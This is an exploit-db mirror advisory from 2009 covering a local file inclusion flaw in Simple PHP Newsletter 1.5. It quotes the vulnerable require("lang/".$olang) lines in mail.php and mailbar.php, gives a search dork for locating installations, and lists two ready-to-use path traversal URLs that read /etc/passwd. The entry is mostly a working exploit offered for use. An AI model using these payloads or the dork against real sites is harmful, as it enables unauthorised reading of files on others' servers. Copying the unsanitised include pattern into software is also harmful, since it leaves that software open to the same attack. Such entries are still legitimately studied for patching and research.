exploit-db-mirror/exploits/php/webapps/7813.txt

                                   --:local file include:--
---------------------------------
script:Simple PHP Newsletter 1.5

----------------------------------------------
download from:http://quirm.net/download/23/

----------------------------------------------

...............................................
vul:/mail.php line 11:

if(isset($olang))
{
require("lang/".$olang); line 11
-------------------------------------------
vul:/mailbar.php line 5:

<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); line 5
-------------------------------------------


----------------------------------------------------

dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------

xpl:

http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd

http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from:[iran]
---------------------------------------------------

# milw0rm.com [2009-01-16]